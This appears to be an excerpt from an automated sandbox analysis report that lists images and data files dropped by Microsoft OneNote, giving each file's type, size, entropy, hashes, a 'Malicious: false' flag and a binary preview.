                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.354431856020487
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Ish15iTztpVtaZpEYXL7OMCX1Ct/9lsdpyY4rdMrnhNrWFX109cdsV:IspiTRpV4vEQAX1m9lY74RM/Wls
                                                                                                                                                                                                              MD5:8D0F5F4337A31C6283DA5A5B2993370F
                                                                                                                                                                                                              SHA1:EA23D1C7706FC9123710DB1F096A08A1B8EC1A0E
                                                                                                                                                                                                              SHA-256:52E45F23E66D5AF52CBC0E4D04C86E0680A11EB04F2AEE8E6EC784DF99056B74
                                                                                                                                                                                                              SHA-512:746936E7E9EEAD7A84D9B3B7A540672C5F943A94D99B258DA83645A932EE09DFB04AD84F72CDBAFFEFA3D52B887322932AE46CEBE9E44685B3C108AEE548A39E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..+.......+.8hQ.5........+.8hQ.5........+..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............^..I6...Z..T.h....N...^....................1O.^!...........f........................................I.qk..B.....LZ..............^..I6...Z..T.h..........^..I6...Z..T.h...........+.......+.......+...........................................+j......+T.]....+.......+..B....+H......+..B....+..>.)..+..J...................;........4...4...4.."................+...+...+..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........+.......+....#..+............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36740
                                                                                                                                                                                                              Entropy (8bit):7.48266872907324
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                                                                                                                              MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                                                                                                                              SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                                                                                                                              SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                                                                                                                              SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.48706931607948
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:9s0NORuwtMlEL1XD9ZyxkRMr66uFRKrtW8Adurb74:9s0NORuwt5L1XD9ZyxkRMr66uFRKrtWT
                                                                                                                                                                                                              MD5:A7041CEAFD29833B9687019CB4DEAEB8
                                                                                                                                                                                                              SHA1:A1E3141C73055620C0D7610CC518720BFCC5467F
                                                                                                                                                                                                              SHA-256:03F468C9C40ABB54E990B495949BCEC172E4C1FF61470204F0B01D97A101CF05
                                                                                                                                                                                                              SHA-512:4C9C0BAD0FABCFD01E2B04ECEA5327092C10DE7E73EBDF087701449BB9504F8658AE023FC8508216C0611721045E6333B4E734BC51495E7DB03CCFB6B27D6F99
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZ..q.......qb.a.0..Q.....qb.a.0..Q.....q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................d.X...Q..j......N...^................Z...bl@.s...Y........f........................................I.qk..B.....LZ................d.X...Q..j..............d.X...Q..j.............q.......q.......q...........................................qj......qT.]....q.......q..B....qH......q..B....q..>.)..q..J...................;........4...4...4.."................q...q...q..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........q.......q....#..q............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53259
                                                                                                                                                                                                              Entropy (8bit):7.651662052139301
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                                                                                              MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                                                                                              SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                                                                                              SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                                                                                              SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.322757117631226
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2sYMfdnJDAptIoOEXDJMGXnt9psopyprdMr8E7FX+g6DK+p0P6pbl3:2s7DAp2TEXZXt9pxERMJmr
                                                                                                                                                                                                              MD5:150A5E348691D24B59FA51FF07EA4702
                                                                                                                                                                                                              SHA1:F9E7FD7159FD1F24260DB99F9AA40E6BA01F09C8
                                                                                                                                                                                                              SHA-256:B4981F777507813CC526A37610C8D58B267F4494C225CADB6A32481122AE4792
                                                                                                                                                                                                              SHA-512:2FE9DB1F84F22D15D52D906BC9E5ED076B7DB21CA7397AF30AE452A49B626D9685EFC3CBB71662EBA6C09984DDC9FF8AEA7BE36B8412B03D963F955BAEAC9DF9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZf+7.....f+7.m.../:m Fx..f+7.m.../:m Fx..f+7..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............J..?U..5...!6.;....N...^.................T....O.*q.X.a.........f........................................I.qk..B.....LZ............J..?U..5...!6.;........J..?U..5...!6.;.........f+7.....f+7.....f+7.........................................f+7j....f+7T.]..f+7.....f+7..B..f+7H....f+7..B..f+7..>.)f+7..J...................;........4...4...4.."..............f+7.f+7.f+7..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........f+7.....f+7....#f+7............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60924
                                                                                                                                                                                                              Entropy (8bit):7.758472758205366
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                                                                                                                              MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                                                                                                                              SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                                                                                                                              SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                                                                                                                              SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.3244272524242495
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:8s2fd7ipav9XtuWhEJtZkXA9ZsEpyJrdMrUEtFXihO9GiFveNv+1:8s2tipq9XDEaXA9ZFMRMUsGiFWNv+
                                                                                                                                                                                                              MD5:245A3A36442B4CDF7760E2A60FB39932
                                                                                                                                                                                                              SHA1:185544E2733C02DE99116D632DE42FFD4E37C315
                                                                                                                                                                                                              SHA-256:E5B8C8C59712031317EC5E7B3BDE7657BC141C64BADC9A9F58FE5BD23F187235
                                                                                                                                                                                                              SHA-512:84C92825302D914AB0442DD449808E6B37FE95671B0F6273A1CE0E05956EB4BFCAA52A594014A49CCAF3FF9B77DCFCB549AAB14A0F374B637ACD08A43ADA814A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..Y.......Yj..g.:Wy/.(....Yj..g.:Wy/.(....Y..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................|..-..<ClI.....N...^.................5..$NH.......^........f........................................I.qk..B.....LZ.................|..-..<ClI..............|..-..<ClI............Y.......Y.......Y...........................................Yj......YT.]....Y.......Y..B....YH......Y..B....Y..>.)..Y..J...................;........4...4...4.."................Y...Y...Y..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........Y.......Y....#..Y............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):515
                                                                                                                                                                                                              Entropy (8bit):6.740133870626016
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                                                                                                                              MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                                                                                                                              SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                                                                                                                              SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                                                                                                                              SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.342391086821856
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:usxZwdcMtZ6k6xEPA8SpXp9RsspyxrdMrdZdFXK8xAejJYg:uswcMGTEP+Xp9R98RMXdflY
                                                                                                                                                                                                              MD5:3C4CE3C9A5BCDBD81C3E727ED57D7882
                                                                                                                                                                                                              SHA1:A3B202FD92EEEEFCE14D63CB157FA183F4E7F97E
                                                                                                                                                                                                              SHA-256:FDBF539D8557F16B31A71737F082CFAECCA8DC97C1275EBFB77822EB478FA99E
                                                                                                                                                                                                              SHA-512:BAE1BB67BBCC128844BAD95DF81EDFFBB719A9AE20F5A2FB98CEBC18EC412891CA94BA9F0C2C2FB7CF852BFEAE8755BCDF4B138FB45C07A3A079675CC681EFA6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ.G.......G.T....%.tn.n...G.T....%.tn.n...G...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............\...Ff3.2?w'.y].....N...^................|..p.H...{.'.........f........................................I.qk..B.....LZ............\...Ff3.2?w'.y].........\...Ff3.2?w'.y]...........G.......G.......G...........................................G.j.....G.T.]...G.......G...B...G.H.....G...B...G...>.).G...J...................;........4...4...4.."...............G...G...G...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........G.......G.....#.G.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1547
                                                                                                                                                                                                              Entropy (8bit):6.4194805172468286
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                                                                                                                              MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                                                                                                                              SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                                                                                                                              SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
                                                                                                                                                                                                              SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.343100343997047
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:sobSsYnLDecHt7TNhE05Ij6XU2f9d3UTpyNrdMrDUeUFX00pgpsZ:sobSsYD5HhEUXUC9dkTARMCqPs
                                                                                                                                                                                                              MD5:E774F3CAF68E41FE41E0CAB9307F3248
                                                                                                                                                                                                              SHA1:36CA53DF89B95775A4CADEABCDEAD8F75156F508
                                                                                                                                                                                                              SHA-256:D800C8A574EFB9F9A0A8E51435B00917679EA63F86425F2FDF045E05BAA617EF
                                                                                                                                                                                                              SHA-512:3254DD1CA497EA6F19EE9C98D127B800013D9850A00F809A6E00B5812712CE5D9467BE327FD4C30183904883177C0BB4DC19145565B1A52B57388FDD00AF6363
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........}.n.......Q...}.n.......Q.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................^]...@[........N...^................7r&...@.-.:..X........f........................................I.qk..B.....LZ................^]...@[................^]...@[............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):95763
                                                                                                                                                                                                              Entropy (8bit):7.931689087616878
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                                                                                                                              MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                                                                                                                              SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                                                                                                                              SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                                                                                                                              SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.284878488747358
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:isZaNy0BkZtk4oEyLgLHXv9lUspy1rdMr/M33BFXo9Gxl8d:isZkBkZiFEy07Xv92sYRM0Bvl8
                                                                                                                                                                                                              MD5:B34E185947B9C2977681B56AEA96FCDA
                                                                                                                                                                                                              SHA1:E29F3C630358962069A394E4EA4193A060C8AF22
                                                                                                                                                                                                              SHA-256:FD26FC992FF022AA601594B792CC00233671D86E0DA300340B5CC7F4A7FB4F15
                                                                                                                                                                                                              SHA-512:DC46EAD6F19E519B8C01D854CBCDA4BD4FC95E368ED637A4D7919F03AEEC6255F39D6540F48A3CD6917B2342678741F5B9FA893E0B3FCB01EDD8406D650D32F9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZj.......j..A.....K.^..?.j..A.....K.^..?.j....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'....................5...x.T.....N...^...................@6AH.q. ...........f........................................I.qk..B.....LZ...................5...x.T................5...x.T..........j.......j.......j...........................................j..j....j..T.]..j.......j....B..j..H....j....B..j....>.)j....J...................;........4...4...4.."..............j...j...j....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........j.......j......#j..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):67991
                                                                                                                                                                                                              Entropy (8bit):7.870481231782746
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                                                                                                                              MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                                                                                                                              SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
                                                                                                                                                                                                              SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                                                                                                                              SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.314848547950657
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:gsi+3RfIFUjU0oEdlXdG9y3gRM7ECPJ483ujWgy8:gstfIFSdlXE9UgRM7hx42
                                                                                                                                                                                                              MD5:CB5BE6B3EF33D72D785AF5048181163E
                                                                                                                                                                                                              SHA1:EE0001CF2A8F6B476D3DBC54881B83174172D58A
                                                                                                                                                                                                              SHA-256:7B672DA0FFADFA5FAC3FF654EF6B722DEA7DF31D6B5E959CDCD89FCC2CDF15EB
                                                                                                                                                                                                              SHA-512:539ADE0CC3DF10FCBBAEACACADF9BBFD8EC61FD61676F3117A1046770863F2225B9BB254111689D07341CA90F8381BDA35F337FDBC692EAC519FA3E84D9BB601
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZk.......k..J..[...;*...{k..J..[...;*...{k....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............>J.zo........W.....N...^................|..!-,J..C.^.~.........f........................................I.qk..B.....LZ.............>J.zo........W..........>J.zo........W..........k.......k.......k...........................................k..j....k..T.]..k.......k....B..k..H....k....B..k....>.)k....J...................;........4...4...4.."..............k...k...k....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........k.......k......#k..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22203
                                                                                                                                                                                                              Entropy (8bit):6.977175130747846
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                                                                                              MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                                                                                              SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                                                                                              SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                                                                                              SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                                                                                              Malicious:false
